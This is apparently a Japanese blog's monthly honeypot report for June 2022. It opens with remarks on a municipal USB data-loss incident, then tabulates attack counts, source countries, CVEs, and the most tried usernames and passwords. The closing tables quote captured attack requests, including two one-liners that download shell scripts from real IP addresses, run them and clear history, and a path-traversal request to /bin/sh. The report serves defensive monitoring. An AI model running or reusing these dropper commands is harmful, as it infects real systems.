Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年6月)

今月のTopics

6月21日(火)にBIPROGY社の協力会社社員による大規模な情報漏洩事故が発生した。


コールセンターでのデータ移管作業用に尼崎市の全市民(約46万人分)の個人情報を含むUSBメモリーを就業先から持ち出した後、帰宅時に当該USBメモリーを入れたかばんの紛失したとの報道による発表がなされた。


本件にはUSBを用いた情報セキュリティ運用の典型的な例であり、身につまされる事故である。
考えられる問題点は以下の通り。

  • USBの持ち出しについて再委託先社員による持ち出し運用を尼崎市が把握しておらず、尼崎市が受託者に対してUSBメモリー持ち出時の許可を得る運用を徹底していなかったこと。
  • 情報の運搬にあたり、BIPROGY社の協力会社社員が個人でUSBメモリーを就業先から持ち出したこと。
  • BIPROGY社の協力会社社員によるUSBメモリーの運搬にあたり、適切な対応がとられていないこと。
  • 情報漏洩発生時に即座に関係先への情報連絡がなされず、BIPROGY社の協力会社社員が個人で捜索した後に情報連絡がなされたこと。

www.city.amagasaki.hyogo.jp

何はともあれ6/24に対象のUSBメモリーが発見されて良かったものである。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2022年6月10日-2022年6月30日
運用期間:20日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Ddospot 1,170,161 211,433
2 Cowrie 985,516 ▲610,883
3 Honeytrap 636,355 ▲272,039
4 Dionaea 392,151 34,410
5 Heralding 287,000 ▲548,748
6 Mailoney 27,384 11,345
7 Adbhoney 7,870 ▲6,428
8 Tanner 4,026 ▲2,634
9 Redishoneypot 2,426 ▲2,062
10 ConPot 1,840 ▲279
11 CitrixHoneypot 1,562 ▲1,322
12 Ciscoasa 1,501 ▲1,456
13 ElasticPot 693 ▲193
14 Ipphoney 149 ▲62
15 Medpot 120 ▲1,414
16 Dicompot 81 ▲75
  • Result
    • Ddospotへのアクセス数が増加していた。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Brazil 673,263 ↑(8)
2 United States 398,933 →(2)
3 China 386,464 →(3)
4 Netherlands 317,730 ↓(1)
5 Russia 163,777 ↓(4)
6 Japan 129,188 ↓(5)
7 Ireland 91,700 ↑(圏外)
8 India 63,168 ↑(10)
9 Vietnam 62,249 ↑(14)
10 United Kingdom 55,822 ↑(16)
11 Germany 51,174 ↓(6)
12 Singapore 47,327 ↓(11)
13 South Korea 38,781 ↓(12)
14 Bangladesh 32,478 ↑(圏外)
15 Indonesia 29,213 ↑(19)
16 Sweden 26,230 ↑(20)
17 France 25,208 ↓(13)
18 Hong Kong 24,849 →(18)
19 Panama 21,789 ↑(圏外)
20 Costa Rica 20,997 ↑(圏外)
  • Result
    • 集計期間が少ないこともあるがブラジルからのアクセス数が一時的に増加し、ニュージーランドおよび中国からのアクセスが減少した。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 162,184
2 CVE-2020-11910 3,393
3 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 45
4 CVE-1999-0016 1
  • Result
    • 先月から変更なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 71,677
2 sa 10,501
3 admin 7,972
4 nproc 3,682
5 user 2,176
6 (empty) 1,352
7 support 1,222
8 test 1,189
9 22 884
10 postgres 847
11 ubuntu 847
12 oracle 524
13 2Wire 449
14 !root 430
15 git 389
16 ftpuser 358
17 guest 319
18 www 295
19 adm 290
20 user2 263
21 mysql 257
22 666666 239
23 blank 236
24 0 235
25 debug 235
26 jenkins 228
27 unknown 228
28 administrator 227
29 $ALOC$ 223
30 ubnt 222
31 deploy 221
32 testuser 215
33 ftp 214
34 anonymous 208
35 minecraft 204
36 Admin 190
37 user1 190
38 db 183
39 web 177
40 wwwroot 172
41 test1 152
42 www-data 141
43 dev 135
44 server 132
45 tomcat 132
46 alex 126
47 nagios 126
48 hadoop 124
49 steam 122
50 ts3 122
  • Result
    • 先月から変更なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 123456 4,519
2 admin 4,313
3 nproc 3,682
4 (empty) 2,975
5 123 1,722
6 password 1,529
7 1234 1,435
8 1 1,326
9 12345 1,119
10 suport 727
11 blank 677
12 12345678 667
13 0 491
14 test 396
15 user 376
16 123456789 342
17 666666 318
18 123123 311
19 ubnt 304
20 support 301
21 root 291
22 master 282
23 1234567 268
24 alpine 262
25 P@ssw0rd 260
26 00000000 258
27 111111 247
28 qwerty 247
29 backup 246
30 1qaz2wsx 244
31 hi3518 232
32 unknown 231
33 synnet 227
34 10023 222
35 _Cisco 219
36 !ishtar 212
37 1q2w3e4r 206
38 admin123 204
39 Passw0rd 195
40 test123 192
41 abc123 190
42 passw0rd 190
43 bosco 172
44 Pa$$w0rd 171
45 p@ssw0rd 165
46 123qwe 164
47 1234567890 162
48 12 152
49 P@ssword 151
50 pa55word 147
  • Result
    • 先月から変更なし

⑥今月のmasscanとZmap
  • masscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • masscanのアクセス数が通常の月と比較して増加傾向にあった。6月30日に複数回のアクセスを確認した。

最後に

  • 情報漏洩事故が起こるとプロジェクト関係者の捜索隊が結成されて、関連先の一斉捜索が行われるのは今でも続いているのだろうか?情報漏洩事故の発生場所が大都市になればなるほど捜索範囲が広くて大変だった記憶がある。昔は新宿のコクーンタワーの真下の草むらに盗まれた財布がよく捨てられていたのだ。
  • 余談ではあるが、今回の情報漏洩事故を聞いて2022年4月1日に日本ユニシス社が社名変更していたのは驚いた。日本有数の大企業であっても常に変革が行われていることを実感するものである。

◆shファイルに関するアクセス

No アクセス内容 備考
1 /nig.sh rm -rf nig.sh; rm -rf miori.*; wget http://2.56.59.225/nig.sh || curl -O http://2.56.59.225/nig.sh || tftp 2.56.59.225 -c get nig.sh || tftp -g -r nig.sh 2.56.59.225; chmod 777 nig.sh;./nig.sh ssh; rm -rf nig.sh
2 /brokeskid.sh cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://62.197.136.157/brokeskid.sh; chmod 777 *; sh brokeskid.sh; tftp -g 62.197.136.157 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
3 /epgrec/do-record.sh EPGrecは録画予約システムのWebアプリケーション
4 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh ---

◆exeファイルに関するアクセス

No アクセス内容 備考
1 /s.exe ---